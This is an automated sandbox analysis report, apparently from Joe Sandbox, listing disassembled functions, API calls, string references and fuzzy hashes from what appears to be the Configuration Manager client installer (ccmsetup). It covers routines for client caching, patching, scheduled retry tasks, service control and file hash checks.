                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$CCopySWDSourceTask::GetCacheLocationFromWMI$CacheConfig.ConfigKey="Cache"$Failed to get cache location from WMI. Error 0x%x$Location$preuninstallcopysource.cpp$preuninstallcopysource.cpp$preuninstallcopysource.cpp$preuninstallcopysource.cpp$preuninstallcopysource.cpp$preuninstallcopysource.cpp$root\ccm\softmgmtagent$spCacheConfig.GetString(szLocation, sCacheLocation)$spNS.Get(szCacheObject, &spCacheConfig)$spNS.Open(szNamespace)
                                                                                          • API String ID: 3353525418-556540881
                                                                                          • Opcode ID: 8e59fb71087dbb9bb38cdba7deee32df3aa671f3d8fa88ae339ee194c90c7d4a
                                                                                          • Instruction ID: 950032d04dd449d1de88675cf7dd20e824aafceb2ce4ea32a92b22db1ee7dd6b
                                                                                          • Opcode Fuzzy Hash: 8e59fb71087dbb9bb38cdba7deee32df3aa671f3d8fa88ae339ee194c90c7d4a
                                                                                          • Instruction Fuzzy Hash: B241A4B0D812A9AADB25EBE4CD4AFAE7E65BF51B40F094049B5046B2C2C7B42A05C752
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005FB323
                                                                                            • Part of subcall function 006109E6: __EH_prolog3_catch.LIBCMT ref: 006109ED
                                                                                            • Part of subcall function 006109E6: EnterCriticalSection.KERNEL32(?,00000010,00619DDF,00000000,?,?,00615238,?,CCM::Utility::CcmIsInConnectedStandby,00000020,005F1472,?), ref: 006109F7
                                                                                            • Part of subcall function 006013B4: __EH_prolog3.LIBCMT ref: 006013BB
                                                                                            • Part of subcall function 0060B178: __EH_prolog3.LIBCMT ref: 0060B17F
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 00603360: __EH_prolog3_catch_GS.LIBCMT ref: 00603367
                                                                                            • Part of subcall function 00603360: GetCurrentThreadId.KERNEL32 ref: 006033F8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005FB3C2
                                                                                            • Part of subcall function 005B15E4: __EH_prolog3.LIBCMT ref: 005B15EB
                                                                                            • Part of subcall function 00577FD4: __EH_prolog3.LIBCMT ref: 00577FDB
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005FB462
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005FB4D2
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: H_prolog3$CurrentThread$H_prolog3_catch_$CriticalEnterH_prolog3_catchSection
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$CCM$CCM::Utility::GetClientID$CCM_Client=@$ClientID$spInstance.GetString(L"ClientID", sValue)$spNamespace.Get(L"CCM_Client=@", &spInstance)$spNamespace.Open(L"CCM", false, 0, bUseAdminLocator)
                                                                                          • API String ID: 437435487-643527026
                                                                                          • Opcode ID: 9979d61cd5980fe2c8185d2d40eb17bcb84046dcd0ab6d0e1052620db47e7904
                                                                                          • Instruction ID: bf535f027a4b0709477b88e44e0b2f8cbf55a9df7d1c9b90ab5e904885d47e01
                                                                                          • Opcode Fuzzy Hash: 9979d61cd5980fe2c8185d2d40eb17bcb84046dcd0ab6d0e1052620db47e7904
                                                                                          • Instruction Fuzzy Hash: 2761A071D45388EAEB11E7A4CA5ABEE7F75AF50704F248098F1417B2C2D7B81B08D7A1
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0057D3D5
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0057D590
                                                                                            • Part of subcall function 00587525: __EH_prolog3_catch_GS.LIBCMT ref: 0058752C
                                                                                            • Part of subcall function 00587525: GetCurrentThreadId.KERNEL32 ref: 005875C1
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0057D46F
                                                                                            • Part of subcall function 005F0DBA: TlsSetValue.KERNEL32(00000000,?,?,?,?,00000004,00571045), ref: 005F0DE1
                                                                                            • Part of subcall function 005F0DBA: lstrlenW.KERNEL32(00000000,?,?,?,?,00000004,00571045), ref: 005F0DF1
                                                                                            • Part of subcall function 005F0DBA: TlsSetValue.KERNEL32(00000000,?,?,?,?,00000004,00571045), ref: 005F0E04
                                                                                            • Part of subcall function 005F0DBA: TlsSetValue.KERNEL32(00000000,?,?,?,?,00000004,00571045), ref: 005F0E3D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0057D6CD
                                                                                          Strings
                                                                                          • ccmsetup.cpp, xrefs: 0057D477
                                                                                          • CcmSetup::CopyCachedClient, xrefs: 0057D419
                                                                                          • Filesystem::File::Copy( sCachedMSI, m_sDownloadDir, 0 ), xrefs: 0057D586
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0057D6C8
                                                                                          • ccmsetup.cpp, xrefs: 0057D45F
                                                                                          • client.msi, xrefs: 0057D4A3, 0057D538
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0057D46A
                                                                                          • Filesystem::File::Copy( sCachedTransform, m_sDownloadDir, 0 ), xrefs: 0057D6C3
                                                                                          • ccmsetup.cpp, xrefs: 0057D580
                                                                                          • ccmsetup.cpp, xrefs: 0057D6BD
                                                                                          • Copied cached client.msi from '%s'. A new one may not be downloaded., xrefs: 0057D5F1
                                                                                          • ccmsetup.cpp, xrefs: 0057D6D9
                                                                                          • GetCachedMsiPath(sPath), xrefs: 0057D465
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0057D58B
                                                                                          • ccmsetup.cpp, xrefs: 0057D59C
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$Value$H_prolog3_catch_$H_prolog3lstrlen
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$CcmSetup::CopyCachedClient$Copied cached client.msi from '%s'. A new one may not be downloaded.$Filesystem::File::Copy( sCachedMSI, m_sDownloadDir, 0 )$Filesystem::File::Copy( sCachedTransform, m_sDownloadDir, 0 )$GetCachedMsiPath(sPath)$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$client.msi
                                                                                          • API String ID: 3809249794-3304853143
                                                                                          • Opcode ID: 7ec00732a52c43f8efa777bf0bb4cb5a88f1b393949c637e8ffd5e2288b3b725
                                                                                          • Instruction ID: 42052fa4d722c56debafc4081f406bc5933930e4934a0b8335373cc8593f3a5b
                                                                                          • Opcode Fuzzy Hash: 7ec00732a52c43f8efa777bf0bb4cb5a88f1b393949c637e8ffd5e2288b3b725
                                                                                          • Instruction Fuzzy Hash: 2FC1BF71C04249EADF10EBA8CD4ABEEBFB9BF91304F248099E145A7182CB745A05DB71
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0057A405
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 005F41CA: __EH_prolog3.LIBCMT ref: 005F41D1
                                                                                            • Part of subcall function 005F4253: __EH_prolog3.LIBCMT ref: 005F425A
                                                                                            • Part of subcall function 00597B94: __EH_prolog3_catch_GS.LIBCMT ref: 00597B9E
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0057A52F
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0057A678
                                                                                          Strings
                                                                                          • CCMAPPLYINGLANGPACKS=TRUE , xrefs: 0057A432
                                                                                          • ApplyPatchChanges failed with error 0x%x. Error text = %s, xrefs: 0057A741
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0057A673
                                                                                          • ccmsetup.cpp, xrefs: 0057A668
                                                                                          • Applying client language and update pack changes. Command line: %s, xrefs: 0057A5F8
                                                                                          • PatchRepair.log, xrefs: 0057A49A
                                                                                          • No client update changes are detected per current client.msi., xrefs: 0057A6C4
                                                                                          • ccmsetup.cpp, xrefs: 0057A53B
                                                                                          • PreparePatchProperties(sPatchProperties, sTmpPatchProperties), xrefs: 0057A525
                                                                                          • Logs\, xrefs: 0057A46E
                                                                                          • ccmsetup.cpp, xrefs: 0057A684
                                                                                          • $, xrefs: 0057A738
                                                                                          • CcmSetup::ApplyPatchChanges, xrefs: 0057A4CC
                                                                                          • ccmsetup.cpp, xrefs: 0057A51F
                                                                                          • InstallPackage( sMsiFile, sLangsRepairLogFile, m_eMsiUILevel, sPatchProperties, m_uInstallRetryCount, m_uRetryTimeout, bRebootRequ, xrefs: 0057A66E
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0057A52A
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3Thread$H_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$ApplyPatchChanges failed with error 0x%x. Error text = %s$Applying client language and update pack changes. Command line: %s$CCMAPPLYINGLANGPACKS=TRUE $CcmSetup::ApplyPatchChanges$InstallPackage( sMsiFile, sLangsRepairLogFile, m_eMsiUILevel, sPatchProperties, m_uInstallRetryCount, m_uRetryTimeout, bRebootRequ$Logs\$No client update changes are detected per current client.msi.$PatchRepair.log$PreparePatchProperties(sPatchProperties, sTmpPatchProperties)$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$$
                                                                                          • API String ID: 1940058678-735209606
                                                                                          • Opcode ID: d6576c952ce216dff58b746c8ed07ca2552c299788bcfd156b51a740d3689d61
                                                                                          • Instruction ID: 1e03be775a65c7cb62a3695fc393af132bb5e4aa5b43f01417316f692a8f731f
                                                                                          • Opcode Fuzzy Hash: d6576c952ce216dff58b746c8ed07ca2552c299788bcfd156b51a740d3689d61
                                                                                          • Instruction Fuzzy Hash: A8A17B71C04248EADF21EBA4CD49BEEBFB9AF52304F148099B405B7182DB745E48DF61
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005BC415
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005BC50C
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005BC56A
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$0&l$0&l$CcmUtilLib::CcmHashFileContent( sFilePath.c_str(), dwHashAlg, baBuffer)$File '%s' doesn't exist.$File '%s' with hash '%s' from manifest doesn't match with the file hash '%s'$HexBinaryEncode(baBuffer.getBuffer(), baBuffer.size(), &csHash)$PCm$Validated file '%s' hash '%s'$VerifyFileHash$t)l$util.cpp$util.cpp$util.cpp$util.cpp
                                                                                          • API String ID: 3454896115-3347796439
                                                                                          • Opcode ID: 55e8654a5cddf8352cea48451166c0244718ab8bac4e495d8fca46a4c5a9c09c
                                                                                          • Instruction ID: 92ede17f5ca5e5032d06d2fd29ed94e3c269b29d4fb42d88e5f55f8d1b139464
                                                                                          • Opcode Fuzzy Hash: 55e8654a5cddf8352cea48451166c0244718ab8bac4e495d8fca46a4c5a9c09c
                                                                                          • Instruction Fuzzy Hash: 2261AF71D00249ABDF10DFA4C989BEE7FB6BF45705F14405AF400AB282DB74AE05CBA5
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00656350
                                                                                            • Part of subcall function 00656CC3: __EH_prolog3_catch_GS.LIBCMT ref: 00656CCA
                                                                                            • Part of subcall function 00656CC3: GetCurrentThreadId.KERNEL32 ref: 00656D51
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00656407
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0065646B
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006564CB
                                                                                          • CoTaskMemFree.OLE32(?,00000000,0089BF10,00000000,?,00000000,00000000,00000000,?,?,00000000,000000FF,CCM::Authentication::CCMGetCurrentCertID,0000002C,0057BB56,?), ref: 0065654B
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$FreeH_prolog3_catchH_prolog3_catch_Task
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\ccmgencert.cpp$..\ccmgencert.cpp$..\ccmgencert.cpp$..\ccmgencert.cpp$..\ccmgencert.cpp$..\ccmgencert.cpp$0&l$Bytes2ComString(pbHash, dwHashLen, &szCertHash)$CCM::Authentication::CCMGetCurrentCertID$dwHashLen > 0$pbHash != 0
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch_memcmp
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\CcmCtl.cpp$..\CcmCtl.cpp$..\CcmCtl.cpp$..\CcmCtl.cpp$..\CcmCtl.cpp$..\CcmCtl.cpp$0 != pCertContext$0 != pSmsCtlContext$CcmGetCertificateContextProperty( pCertContext, 3, sBuff )$CcmUtilLib::CcmIsAllowedCA$t)l
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005F60C3
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,CCM::Utility::String::toAnsi,00000010,00627469,?,?,00000000,00000000,00000000), ref: 005F60F2
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F6126
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F618B
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000000,00000000,00000000,00000000), ref: 005F61AC
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F61E2
                                                                                          Strings
                                                                                          • (szAnsi.resize(uLength) == true) != 0, xrefs: 005F6181
                                                                                          • ..\String.cpp, xrefs: 005F6116
                                                                                          • ..\String.cpp, xrefs: 005F6193
                                                                                          • ..\String.cpp, xrefs: 005F617B
                                                                                          • CCM::Utility::String::toAnsi, xrefs: 005F60CD
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005F6186
                                                                                          • WideCharToMultiByte(0, 0, pszUnicodeString, -1, szAnsi, uLength, 0, 0) > 0, xrefs: 005F61D8
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005F6121
                                                                                          • ..\String.cpp, xrefs: 005F61D2
                                                                                          • uLength > 0, xrefs: 005F611C
                                                                                          • ..\String.cpp, xrefs: 005F6132
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005F61DD
                                                                                          • ..\String.cpp, xrefs: 005F61EE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$ByteCharMultiWide$H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$(szAnsi.resize(uLength) == true) != 0$..\String.cpp$..\String.cpp$..\String.cpp$..\String.cpp$..\String.cpp$..\String.cpp$CCM::Utility::String::toAnsi$WideCharToMultiByte(0, 0, pszUnicodeString, -1, szAnsi, uLength, 0, 0) > 0$uLength > 0
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005960A2
                                                                                            • Part of subcall function 0059E344: __EH_prolog3_catch.LIBCMT ref: 0059E34B
                                                                                            • Part of subcall function 005F4099: __EH_prolog3.LIBCMT ref: 005F40A0
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005961BF
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0059628F
                                                                                            • Part of subcall function 005F41CA: __EH_prolog3.LIBCMT ref: 005F41D1
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3Thread$H_prolog3_catchH_prolog3_catch_
                                                                                          • String ID: %s"%s" %s"%s"$%$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$ADDLOCAL=$CcmSetup::PrepareDeltaLangPackProperties$File %s is not a valid client language or update pack. Ignore it.$File %s is not a valid client language pack. Ignore it.$GetFileNameFromQualifiedPath(it->sFileName, sFileName)$GetInstalledLanguages(mapInstalledLangs)$PATCH=$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005C6286
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 005B5FD5: __EH_prolog3_catch_GS.LIBCMT ref: 005B5FDC
                                                                                            • Part of subcall function 005B5FD5: GetCommandLineW.KERNEL32(00000054,005C62D8,?,CreateRetryWinSchedTask,00000078,0057BC8A,00000001), ref: 005B5FE7
                                                                                            • Part of subcall function 005B5FD5: CommandLineToArgvW.SHELL32(00000000,?,GetArgumentsFromCmdLine), ref: 005B601C
                                                                                            • Part of subcall function 005B5FD5: GetLastError.KERNEL32 ref: 005B602B
                                                                                            • Part of subcall function 005B5FD5: GetCurrentThreadId.KERNEL32 ref: 005B6061
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005C6303
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005C63FD
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$CommandH_prolog3_catch_Line$ArgvErrorH_prolog3Last
                                                                                          • String ID: %s%d$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$/PerformUpgrade$/RetryWinTask:$/UpgradeWinTask$/runservice$Configuration Manager Client Retry Task$CreateRetryWinSchedTask$CreateWinSchedTask(c_szRetryWinTaskName, sArguments, iDelayMinutes, sScheduledTimeUtc)$GetArgumentsFromCmdLine(sArguments)$wintask.cpp$wintask.cpp$wintask.cpp$wintask.cpp
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0063C2AF
                                                                                            • Part of subcall function 005F094C: __EH_prolog3_catch_GS.LIBCMT ref: 005F0956
                                                                                            • Part of subcall function 005F094C: GetCurrentThreadId.KERNEL32 ref: 005F09AC
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0063C342
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0063C3A1
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0063C3E5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch_$H_prolog3
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\lsexports.cpp$..\lsexports.cpp$..\lsexports.cpp$..\lsexports.cpp$..\lsexports.cpp$..\lsexports.cpp$CCM::LocationServices::CcmGetADSiteName$CCM::LocationServices::LSGetADSiteName(sADSiteName)$LocationServices$ppszADSiteName!=0$sADSiteName.CoAllocString(ppszADSiteName)
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0060E0F1
                                                                                          • OpenSCManagerW.ADVAPI32(?,?,00000000,CCM::Utility::CServiceControl::Open,00000018,0060D256,?,?,00000008,00000000,CCM::Utility::CServiceControl::CServiceControl,00000024,005BBF0D,ccmexec,00000010,00000000), ref: 0060E124
                                                                                          • GetLastError.KERNEL32 ref: 0060E133
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060E165
                                                                                          • OpenServiceW.ADVAPI32(00000000,00000001,00000000), ref: 0060E1A7
                                                                                          • GetLastError.KERNEL32 ref: 0060E1B4
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060E1E6
                                                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 0060E235
                                                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 0060E247
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: Service$CloseCurrentErrorHandleLastOpenThread$H_prolog3_catchManager
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\ServiceControl.cpp$..\ServiceControl.cpp$..\ServiceControl.cpp$..\ServiceControl.cpp$CCM::Utility::CServiceControl::Open$m_hSCM != 0$m_hService != 0
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005FB1BB
                                                                                          • ExpandEnvironmentStringsW.KERNEL32(%SystemRoot%\ccmsetup\ccmsetup.exe,?,00000104,CCM::Utility::GetCcmSetupDirectory), ref: 005FB218
                                                                                          • GetLastError.KERNEL32 ref: 005FB226
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005FB25F
                                                                                          • ExpandEnvironmentStringsW.KERNEL32(%SystemRoot%\ccmsetup\,?,00000104,CCM::Utility::GetCcmSetupDirectory), ref: 005FB291
                                                                                          • GetLastError.KERNEL32 ref: 005FB29B
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005FB2D4
                                                                                          Strings
                                                                                          • ..\util.cpp, xrefs: 005FB267
                                                                                          • %SystemRoot%\ccmsetup\ccmsetup.exe, xrefs: 005FB213
                                                                                          • CCM::Utility::GetCcmSetupDirectory, xrefs: 005FB1E6
                                                                                          • ExpandEnvironmentStringsW( c_szCcmSetupFile, szCcmSetupDir, 260 ) > 0, xrefs: 005FB255
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005FB25A
                                                                                          • %SystemRoot%\ccmsetup\, xrefs: 005FB28C
                                                                                          • ..\util.cpp, xrefs: 005FB2DC
                                                                                          • ..\util.cpp, xrefs: 005FB24F
                                                                                          • ..\util.cpp, xrefs: 005FB2C4
                                                                                          • ExpandEnvironmentStringsW( c_szCcmSetupDir, szCcmSetupDir, 260 ) > 0, xrefs: 005FB2CA
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005FB2CF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: CurrentEnvironmentErrorExpandLastStringsThread$H_prolog3_catch_
                                                                                          • String ID: %SystemRoot%\ccmsetup\$%SystemRoot%\ccmsetup\ccmsetup.exe$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$CCM::Utility::GetCcmSetupDirectory$ExpandEnvironmentStringsW( c_szCcmSetupDir, szCcmSetupDir, 260 ) > 0$ExpandEnvironmentStringsW( c_szCcmSetupFile, szCcmSetupDir, 260 ) > 0
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0064629B
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006463C0
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006464B4
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                            • Part of subcall function 005F4099: __EH_prolog3.LIBCMT ref: 005F40A0
                                                                                            • Part of subcall function 0061BFB3: __EH_prolog3_catch.LIBCMT ref: 0061BFBA
                                                                                            • Part of subcall function 0061BFB3: GetCurrentThreadId.KERNEL32 ref: 0061C014
                                                                                          Strings
                                                                                          • regKey.Open( (( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), c_szRegKeyPath_CCM, ((((0x00020000L)) | (0x0001) | (0x0008) | (0x0010)) & , xrefs: 006463B6
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006464AF
                                                                                          • LSGetLookupMPListFromRegistry, xrefs: 00646348
                                                                                          • ..\lsad.cpp, xrefs: 006464BC
                                                                                          • ..\lsad.cpp, xrefs: 006463C8
                                                                                          • LSGetLookupMPListFromRegistry: Failed to get lookup MP list from Registry (%08lX), xrefs: 00646653
                                                                                          • CCM::LocationServices::LSGetLookupMPListFromRegistry, xrefs: 00646303
                                                                                          • Software\Microsoft\CCM, xrefs: 0064637A
                                                                                          • ..\lsad.cpp, xrefs: 006464A4
                                                                                          • LookupMPList, xrefs: 006463F1
                                                                                          • sMPList.tokenize(L";", arrLookupMPs), xrefs: 006464AA
                                                                                          • ..\lsad.cpp, xrefs: 006463B0
                                                                                          • Retrieved lookup MP list [%s] from Registry, xrefs: 0064645E
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006463BB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3$CloseH_prolog3_catchH_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$CCM::LocationServices::LSGetLookupMPListFromRegistry$LSGetLookupMPListFromRegistry$LSGetLookupMPListFromRegistry: Failed to get lookup MP list from Registry (%08lX)$LookupMPList$Retrieved lookup MP list [%s] from Registry$Software\Microsoft\CCM$regKey.Open( (( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), c_szRegKeyPath_CCM, ((((0x00020000L)) | (0x0001) | (0x0008) | (0x0010)) & $sMPList.tokenize(L";", arrLookupMPs)
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005A20FC
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A2229
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A22AD
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                          Strings
                                                                                          • GetClientUpgradeTattoo(bExcluded), xrefs: 005A221F
                                                                                          • 0l, xrefs: 005A2260
                                                                                          • Client is in the upgrade exclusion collection. Stop proceeding., xrefs: 005A21DD, 005A22EC
                                                                                          • setupenv.cpp, xrefs: 005A2219
                                                                                          • CSetupEnvironment::IsExcludedFromUpgrade, xrefs: 005A2107
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005A22A8
                                                                                          • setupenv.cpp, xrefs: 005A229D
                                                                                          • setupenv.cpp, xrefs: 005A2231
                                                                                          • setupenv.cpp, xrefs: 005A22B5
                                                                                          • Client is not installed yet. Ignore all upgrade exclusion flags., xrefs: 005A214E
                                                                                          • IsExcludedFromUpgradeFromPolicy(bExcluded), xrefs: 005A22A3
                                                                                          • ,/l, xrefs: 005A21CF
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005A2224
                                                                                          • Client is stamped with /alwaysexcludeupgrade. Stop proceeding., xrefs: 005A21A2, 005A226E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch
